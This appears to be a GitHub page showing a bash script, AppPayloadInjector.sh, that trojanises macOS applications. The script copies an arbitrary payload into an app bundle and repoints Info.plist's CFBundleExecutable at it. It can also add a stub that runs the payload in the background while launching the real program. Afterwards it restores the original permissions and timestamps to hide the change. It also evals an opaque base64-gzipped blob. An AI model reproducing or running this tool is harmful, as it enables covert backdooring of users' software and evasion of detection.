-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathAppPayloadInjector.sh
More file actions
182 lines (160 loc) · 6.54 KB
/
AppPayloadInjector.sh
File metadata and controls
182 lines (160 loc) · 6.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
#!/bin/bash
# License: The MIT License (MIT)
# Author Zuzzuc https://github.com/Zuzzuc/
b64gzdecode(){
# Input is $1 and optionally $2, where $1 is a string generated by b64gz.sh and $2 is either 'print' or 'evaluate'(defaults to print), to either print the decoded string to stdout or to evaluate the content of the string.
if [ "$2" == "print" ] || [ -z "$2" ];then
echo "$1" | base64 -D | gzip -d
elif [ "$2" == "evaluate" ];then
eval "$(echo "$1" | base64 -D | gzip -d)"
else
return 1
fi
}
catch_err(){
# Input is $1 and optionally $2 and $3, where $1 is the error code description to display, $2 can be specified to override the default error message and $3 is used to supply a string that can be displayed in the error message.
if [ -z "$2" ];then
case "$1" in
1)
echo "Unknown error encountered."
;;
2)
echo "Unknown argument supplied. Failing argument was '$3'."
;;
3)
echo "Payload does not exist. Supplied path was '$3'."
;;
4)
echo "Target application does not exist. Supplied path was '$3'."
;;
5)
echo "The target '$3' is not a OSX application."
;;
6)
echo "Unable to obtain write permission for '$3'."
;;
test)
echo "This is a test error message"
;;
esac
else
echo "$2"
fi
exit "$1"
}
hidden=true
exitOnObstructions=true
if [ "$*" != "" ];then
for i in "$@";do
case "$i" in
"$0") # If this script gets called as a standalone script the executable path will be supplied, so we skip it.
continue
;;
-t=*|--target=*)
target="${i#*=}" && target="${target/\\/}" && target="${target%${target##*[![:space:]]}}"
;;
-p=*|--payload=*)
payload="${i#*=}" && payload="${payload/\\/}" && payload="${payload%${payload##*[![:space:]]}}"
;;
-nohide)
hidden=false
;;
-f|--force)
exitOnObstructions=false
;;
-pn=*|--payloadname=*)
payloadname="${i#*=}" && payloadname="${payloadname/\\/}" && payloadname="${payloadname%${payloadname##*[![:space:]]}}"
;;
-pp=*|--payloadpermission=*)
permission="${i#*=}"
;;
-de|--dualexecute)
dualexec=true
;;
-den=*|--dualexecutename=*)
depn="${i#*=}"
;;
*)
catch_err "2" "" "$i"
;;
esac
done
fi
# Validate payload
if [ ! -f "$payload" ];then
catch_err "3" "" "$payload"
fi
# Validate target
if [ ! -d "$target" ] && [ -r "$target" ];then
catch_err "4" "" "$target"
elif [ "${target:${#target}-4}" != ".app" ];then
catch_err "5" "" "$target"
fi
# Import PlistKeyMod
b64gzdecode "H4sIAFRmb1oCA6VWW2+bSBR+Zn7FyRjXly2mTto8OOtoK1XVRttUkZK+NLUiCoMZGQ8IhmQTx/995wwMYOJcpH2wmeHMd67fOcNFzHP5D7s/T4LhaEN68I37TORsBlcRg/OzK/MChmozUgc+FzJKMvhZPDwUPkRSpvnMdZdcRsXviZ+s3VLiEsJDuAZqD30vjlkGH0YUDuZAKSxOZMQEsdi/XN6sk4DNacZkkQlKWJyzHQEuKQk5IWnGhbwpcm/J0FWL+VECDgP6A18Bz+GiCWaSR+Bch6v17WJ+fevFBVuofbSgZEuI70k/umFZpvX04EykhUQF9vQ93EUsY2qFe+UmqGMqXF85AwHL/YynkicCZAIBz9PYu58QS0fqPKhgD5voLN9TaaP2lAIXBAAsC6zpqFxZpft0aE9H8D2BkMcM8iJNY86CCTWHTk6q1eE+3GXKfB4qAKzY/XsY2OoxUBF4OYhEQpgUIlC2dRhoYI/eo316v6IzAxshAwgSVqpTlcjlHhUf96k4x3wNbKzhADOJCjC8JJN74/v0rB+ZivFWhVgp8SCN9/tx3FHxQ6xEcifAy5bFmgnZpBe+ejzmYoki1DuwjwZP9Y2f0dcQYoKVC1joFbGENcs1D1vEMDqNSpZ7vl5plpevtGpFG71VNNditHCDFub2FAnbg0vVH2lt69bLckKwPnNKiekgL6BEMQBfacbjIimk4vaceoVMKEFNf3siUGnlyHnTouPdzrSIFaoQOXKH2n/RkyDBNFgNpzlyWr+g9gc6Uk/LT4TkomCkDNiynHA+fnQc7WWdy3BO7Q3vjedbCu/egd6G7q9fbnvfV79eb3x9cD3LU89ns8ViuzXJrFzehDN70wu3zrFCzpXzE82Luv2q0pU5skODbjJvqcbXBOsQy0jrIQH0k/bNrqeSWtYVMnHxTq2dlY4e61EHr4tjwu+eX+vzupY1oKzsc4hbjShLXUOqyj+HSTSmYoUBgWVo8hwsUqCIxamx0oMLnMaA70zGWvO5Ax83sG5TGnAr28cUmag59lrWNc90V1lBIlh1eygrubpvcux5kdSmcjWoW2amL6nH+6YiWpmaskEur76cfVcUQ2RXpjusHv5NQstVQ/GupG8WexhvrVcBz8BJoTnujre07R/6XnaAngDKucdHcxuVMuOTBhyUEuyL1lVVtckGn61ubL3tl499TlbXX/hUbabQQ+9uBdTFu8ndLJlUg5edgCbLlhrISNvD45ush3/9Ppr5HXtipcyokLUhq1OTeZP3MupdkSmXcafGZ90vkWbKK5nellTqDILDlzhTjhvSxr7JHJw2bv9v0/rfKKgG3O4NTnb1Hr2sF/VV6nrmOyX1ZNRcpsR6c1ehNhY/4e1dxuUuTZEjSJ1lxlJw8BJS7GmRxaQRzwlNsqG9wY07G7vbP6ajEa2kyCgtGM9cTSHyIon29PUTEuXqY8ThMBjoj0+79AHy/ulk/KfbP7X1BFar2t9WRTT2zaid5H/hgZpnIRf6a6+T9sPX015OxrMQtJznov1BBjuj8eMro3FL/gO+kOTUNwwAAA==" "evaluate"
originalExecutable="$(PlistKeyMod -f="$target/Contents/Info.plist" -k="CFBundleExecutable")" && originalExecutable="${originalExecutable/<string>/}" && originalExecutable="${originalExecutable/<\/string>/}"
reconTargets=("$target" "$target/Contents" "$target/Contents/Info.plist" "$target/Contents/MacOS" "$target/Contents/MacOS/$originalExecutable")
# Get timestamps and permissions for reconTargets
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
timestamp[i]="$(stat -f "%Sm" -t "%m%d%H%M%y" "${reconTargets[i]}")"
permissions[i]="$(stat -f '%A' "${reconTargets[i]}")"
done
# Setup Payload name
if [ -z "$payloadname" ];then
payloadname="$RANDOM"
while [ -f "$target/Contents/MacOS/$payloadname" ];do
payloadname="$RANDOM$RANDOM"
done
fi
# Setup Payload permission
if [ -z "$permission" ];then
permission="$(stat -f '%A' "${reconTargets[4]}")"
fi
if [ "$exitOnObstructions" == "false" ];then
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
if [ ! -w "${reconTargets[i]}" ];then
chmod 755 "${reconTargets[i]}"
if [ ! -w "${reconTargets[i]}" ];then
# Failed to obtain write permission. Exit if it is one of the files we want to modify.
if [ "$i" == "2" ] || [ "$i" == "3" ];then
catch_err "6" "" "${reconTargets[i]}"
fi
fi
fi
done
fi
# Drop payload
cp "$payload" "$target/Contents/MacOS/$payloadname"
if [ "$dualexec" == "true" ];then
# Drop dual exec stub
if [ -z "$depn" ];then
depn="$RANDOM"
fi
while [ -f "$target/Contents/MacOS/$depn" ];do
depn="$RANDOM$RANDOM"
done
dep[0]='#!/bin/bash'
dep[1]='DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"'
dep[2]="eval \"\$DIR/$payloadname\" &"
dep[3]="exec \"\$DIR/$originalExecutable\""
for ((i=0;i<=$((${#dep[@]}-1));i++));do
echo "${dep[i]}" >> "$target/Contents/MacOS/$depn"
done
chmod "$permission" "$target/Contents/MacOS/$depn"
PlistKeyMod -f="$target/Contents/Info.plist" -m="write" -k="CFBundleExecutable" -v="$depn"
else
PlistKeyMod -f="$target/Contents/Info.plist" -m="write" -k="CFBundleExecutable" -v="$payloadname"
fi
chmod "$permission" "$target/Contents/MacOS/$payloadname"
if [ "$hidden" == "true" ];then
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
chmod "${permissions[i]}" "${reconTargets[i]}"
done
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
touch -m "${timestamp[i]}" "${reconTargets[i]}"
done
touch -m "${timestamp[4]}" "$target/Contents/MacOS/$payloadname"
if [ "$dualexec" == "true" ];then
touch -m "${timestamp[4]}" "$target/Contents/MacOS/$depn"
fi
fi